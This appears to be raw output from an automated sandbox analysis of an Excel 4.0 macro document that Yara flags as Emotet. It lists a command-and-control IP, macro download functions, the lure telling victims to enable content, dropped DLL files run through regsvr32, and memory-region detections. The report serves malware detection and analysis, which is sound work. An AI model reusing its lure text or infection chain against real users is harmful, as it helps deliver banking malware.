                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                        Source: unknownTCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: unknownTCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: unknownTCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: unknownTCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: unknownTCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: unknownTCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: unknownTCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: unknownTCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: unknownTCP traffic detected without corresponding DNS query: 168.119.39.118
                        Source: regsvr32.exe, 0000000F.00000002.714272238.0000000003318000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                        Source: unknownHTTPS traffic detected: 168.119.39.118:443 -> 192.168.2.22:49166 version: TLS 1.2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000105A __EH_prolog3,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_strcat,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_1000105A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10043612 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_10043612
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001A1A1 GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_1001A1A1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100422FA GetKeyState,GetKeyState,GetKeyState,3_2_100422FA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100464D4 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,3_2_100464D4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100145C3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_100145C3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100368ED GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,3_2_100368ED

                        E-Banking Fraud

                        barindex
                        Yara detected Emotet
                        Source: Yara matchFile source: 5.2.regsvr32.exe.980000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.regsvr32.exe.240000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.310000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.1f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.420000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.920000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.3f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.470000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.regsvr32.exe.240000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.570000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.280000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.150000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.3f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.5d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.regsvr32.exe.500000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.3b0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.regsvr32.exe.1b0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.950000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 13.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.310000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.5d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.regsvr32.exe.920000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.438925109.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.714099978.0000000000501000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.483801415.0000000000110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.510846343.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.456286070.0000000000981000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.713962264.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.456044054.00000000005D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.468918489.00000000001F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.504764395.0000000000231000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449507584.0000000000110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.490790525.0000000000951000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.474514223.0000000000150000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.449723036.0000000000281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.510821568.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.522451287.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.504642074.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.474534768.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.497540117.00000000003F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.497591181.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.462842300.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.462862121.0000000000571000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.438768483.0000000000110000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.490748655.0000000000920000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.522428757.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.469106015.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY

                        System Summary

                        barindex
                        Found malicious Excel 4.0 Macro
                        Source: commenti_19265309.xlsmMacro extractor: Sheet: EFALGV contains: URLDownloadToFileA
                        Source: commenti_19265309.xlsmMacro extractor: Sheet: EFALGV contains: urlmon
                        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                        Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                        Source: Screenshot number: 4Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                        Source: Screenshot number: 8Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                        Source: Screenshot number: 8Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                        Source: Screenshot number: 12Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 Gb 9 10 11 12 13 14 15 16 17
                        Source: Screenshot number: 12Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 Gb 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
                        Office process drops PE file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\sei.ocxJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Lg1r0mo1[1].dllJump to dropped file
                        Found Excel 4.0 Macro with suspicious formulas
                        Source: commenti_19265309.xlsmInitial sample: EXEC
                        Source: commenti_19265309.xlsmInitial sample: EXEC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004B05E3_2_1004B05E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004F3363_2_1004F336
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004B46A3_2_1004B46A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1006D66D3_2_1006D66D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1005D8473_2_1005D847
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004B88A3_2_1004B88A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1006B89B3_2_1006B89B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1005D95D3_2_1005D95D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1006BDC43_2_1006BDC4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100521713_2_10052171
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100481E03_2_100481E0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1006C3063_2_1006C306
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1006036A3_2_1006036A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100684263_2_10068426
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001643C3_2_1001643C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100704463_2_10070446
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004A7B73_2_1004A7B7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1006C9653_2_1006C965
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1006CBD93_2_1006CBD9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1006AC0B3_2_1006AC0B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004AC8A3_2_1004AC8A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10052CE33_2_10052CE3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028BE094_2_0028BE09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002904184_2_00290418
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029EAA34_2_0029EAA3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00286CBB4_2_00286CBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002866B04_2_002866B0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028B4FC4_2_0028B4FC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002A110E4_2_002A110E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002847004_2_00284700
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002835114_2_00283511
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029D14C4_2_0029D14C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028D3464_2_0028D346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028E1A94_2_0028E1A9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002909F94_2_002909F9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002963F04_2_002963F0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00291FD04_2_00291FD0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028F1D54_2_0028F1D5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029882F4_2_0029882F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028F43B4_2_0028F43B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028B2004_2_0028B200
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002A1E194_2_002A1E19
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028A01C4_2_0028A01C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029DE114_2_0029DE11
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029E6124_2_0029E612
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029B2154_2_0029B215
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002896174_2_00289617
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002A086F4_2_002A086F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002A0E6D4_2_002A0E6D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029F0604_2_0029F060
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002818654_2_00281865
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002822794_2_00282279
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00288C7C4_2_00288C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00290C7C4_2_00290C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002974734_2_00297473
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00284E774_2_00284E77
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029F24C4_2_0029F24C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002A225A4_2_002A225A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00283C514_2_00283C51
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002916AD4_2_002916AD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029D6B14_2_0029D6B1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029A4B54_2_0029A4B5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028508B4_2_0028508B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00286A8D4_2_00286A8D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029B6874_2_0029B687
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028D8994_2_0028D899
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029EC9B4_2_0029EC9B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00285C9A4_2_00285C9A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002954974_2_00295497
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002900974_2_00290097
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002A1AE94_2_002A1AE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002888E54_2_002888E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029BAF24_2_0029BAF2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002818F64_2_002818F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002872CC4_2_002872CC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028CED84_2_0028CED8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029DAD84_2_0029DAD8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00293CDD4_2_00293CDD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029692B4_2_0029692B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029112D4_2_0029112D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028BB234_2_0028BB23
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002819304_2_00281930
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002891334_2_00289133
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029C5354_2_0029C535
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00283F094_2_00283F09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00281B094_2_00281B09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00295D684_2_00295D68
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029C16B4_2_0029C16B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028E3794_2_0028E379
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00290F7A4_2_00290F7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002843424_2_00284342
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028DB594_2_0028DB59
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002995A84_2_002995A8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00291DA64_2_00291DA6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029AFB04_2_0029AFB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00284BB44_2_00284BB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029E18B4_2_0029E18B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00289B804_2_00289B80
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028F7844_2_0028F784
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0029B3844_2_0029B384
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002991844_2_00299184
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002877864_2_00287786
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002875994_2_00287599
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002859954_2_00285995
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002951E84_2_002951E8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002A13FD4_2_002A13FD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002A03F24_2_002A03F2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002941CF4_2_002941CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002A27DF4_2_002A27DF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0028C7D14_2_0028C7D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002947D24_2_002947D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00986CBB5_2_00986CBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009866B05_2_009866B0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099EAA35_2_0099EAA3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098B4FC5_2_0098B4FC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009904185_2_00990418
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098BE095_2_0098BE09
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098E1A95_2_0098E1A9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00991FD05_2_00991FD0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098F1D55_2_0098F1D5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009909F95_2_009909F9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009963F05_2_009963F0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009835115_2_00983511
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009A110E5_2_009A110E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009847005_2_00984700
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099D14C5_2_0099D14C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098D3465_2_0098D346
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098D8995_2_0098D899
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099EC9B5_2_0099EC9B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00985C9A5_2_00985C9A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009954975_2_00995497
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009900975_2_00990097
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098508B5_2_0098508B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00986A8D5_2_00986A8D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099B6875_2_0099B687
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099D6B15_2_0099D6B1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099A4B55_2_0099A4B5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009916AD5_2_009916AD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098CED85_2_0098CED8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099DAD85_2_0099DAD8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00993CDD5_2_00993CDD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009872CC5_2_009872CC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099BAF25_2_0099BAF2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009818F65_2_009818F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009A1AE95_2_009A1AE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009888E55_2_009888E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009A1E195_2_009A1E19
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098A01C5_2_0098A01C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099DE115_2_0099DE11
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099E6125_2_0099E612
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099B2155_2_0099B215
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009896175_2_00989617
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098B2005_2_0098B200
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098F43B5_2_0098F43B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099882F5_2_0099882F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009A225A5_2_009A225A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00983C515_2_00983C51
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099F24C5_2_0099F24C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009822795_2_00982279
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00988C7C5_2_00988C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00990C7C5_2_00990C7C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009974735_2_00997473
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00984E775_2_00984E77
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009A086F5_2_009A086F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009A0E6D5_2_009A0E6D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099F0605_2_0099F060
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009818655_2_00981865
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009875995_2_00987599
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009859955_2_00985995
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099E18B5_2_0099E18B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00989B805_2_00989B80
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098F7845_2_0098F784
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099B3845_2_0099B384
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009991845_2_00999184
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009877865_2_00987786
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0099AFB05_2_0099AFB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00984BB45_2_00984BB4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009995A85_2_009995A8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_00991DA65_2_00991DA6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009A27DF5_2_009A27DF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0098C7D15_2_0098C7D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009947D25_2_009947D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009941CF5_2_009941CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009A13FD5_2_009A13FD
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009A03F25_2_009A03F2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_009951E85_2_009951E8
